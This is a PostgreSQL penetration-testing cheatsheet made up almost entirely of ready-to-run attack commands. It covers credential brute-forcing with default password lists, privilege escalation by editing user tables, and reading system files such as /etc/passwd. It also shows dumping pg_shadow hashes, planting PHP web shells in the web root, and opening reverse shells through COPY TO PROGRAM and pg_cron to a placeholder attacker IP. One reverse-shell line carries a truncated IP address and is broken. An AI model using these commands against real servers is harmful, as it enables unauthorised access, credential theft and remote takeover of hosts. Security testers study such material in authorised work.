Postgres Pentest Cheatsheet - Port 5432


nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 
 #check the reported version against known issues; the vulners script matches on the banner, so confirm a hit before relying on it
Bruteforcing Postgres Creds

#Using Metasploit
use auxiliary/scanner/postgres/postgres_login

#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres

Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
● root : root

#or for a better wordlist 
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt
Accessing remote Postgresql server

psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>
PrivEsc when Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  #you will be prompted for the password

#List tables
\dt
#Show access privileges
\dp
#Dump the table contents (check the home directory column, just in case)
select * from table_name;

Example to update a value in the matching rows:
#Giving root privs
update table_name set gid=0 where gid=1001;

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');
Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile

#Read a file into a table
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from new;

#Export a table to a file, or read a file directly
COPY pg_catalog.pg_user TO '/tmp/outfile' WITH CSV;
SELECT pg_read_file('/etc/passwd', 0, 1000);

#Write a file 
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';

#If large objects (LO) are enabled - use it to exec a script
SELECT lo_export(12345, '/tmp/evil_script.sh');
Dumping Hashes

auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;

auxiliary/scanner/postgres/postgres_hashdump
Postgres Commands 

#Login to Postgres 
psql -h localhost -U Username -d DB_Name

#List all databases
\l
SELECT datname FROM pg_database;

#Check the current database
SELECT current_database();

#Connect to a specific database
\c database_name

#List all schemas
\dn
SELECT schema_name FROM information_schema.schemata;

#List all tables in a specific schema
SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';

#List all tables in the current database
\dt
SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';
SELECT tablename FROM pg_tables;

#List tables owned by the current user
SELECT tablename FROM pg_tables WHERE tableowner = current_user;

#List columns of a specific table
\d table_name
SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'table_name';

#List all columns in the database
SELECT table_name, column_name FROM information_schema.columns;

#List all users/roles
\du
SELECT usename FROM pg_user;

#Check the current user
SELECT current_user;

#Check privileges of a specific user
SELECT grantee, privilege_type FROM information_schema.role_table_grants WHERE grantee = 'username';

#List indexes for a table
\di
SELECT indexname, indexdef FROM pg_indexes WHERE tablename = 'table_name';

#List constraints on a table
SELECT constraint_name, constraint_type FROM information_schema.table_constraints WHERE table_name = 'table_name';

#List all triggers
SELECT tgname FROM pg_trigger;

#List all functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';

#List all installed extensions
\dx
SELECT * FROM pg_extension;

#Check available extensions
SELECT * FROM pg_available_extensions;

#Read a file
SELECT pg_read_file('/etc/passwd', 0, 2000);
Postgres Reverse Shells

#if postgres has write access to /var/www/html
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
#access it via
http://victim.com/shell.php?cmd=nc -e /bin/sh attacker_ip 4444

#if pg_cron is installed
SELECT cron.schedule('rev_shell', '1 minute', 'bash -c "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"');

#Revshells
COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash 10.10.10.10 9001';
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"';
COPY (SELECT '') TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10. 9001 >/tmp/f';
COPY (SELECT pg_backend_pid()) TO PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f';

